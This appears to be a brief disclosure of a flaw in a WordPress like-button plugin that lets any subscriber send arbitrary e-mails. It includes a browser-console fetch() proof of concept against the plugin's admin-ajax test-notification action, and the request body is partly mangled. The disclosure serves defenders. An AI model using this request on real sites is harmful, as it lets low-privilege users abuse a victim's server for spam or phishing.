The plugin allows any logged-in user, such as subscriber, to send arbitrary e-mails to any recipient, with any subject and body

PoC

As a subscriber, run the below command in the web developer console of the browser fetch(“/wp-admin/admin-ajax.php?action=likebtn_test_vote_notification”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: "options[likebtn_notify_to][email protected]&options;[likebtn_notify_subject]=hehehe&options;[likebtn_notify_text]=Hopsasa**

", “method”: “POST”, “credentials”: “include” }) .then(response => response.text()) .then(data => console.log(data));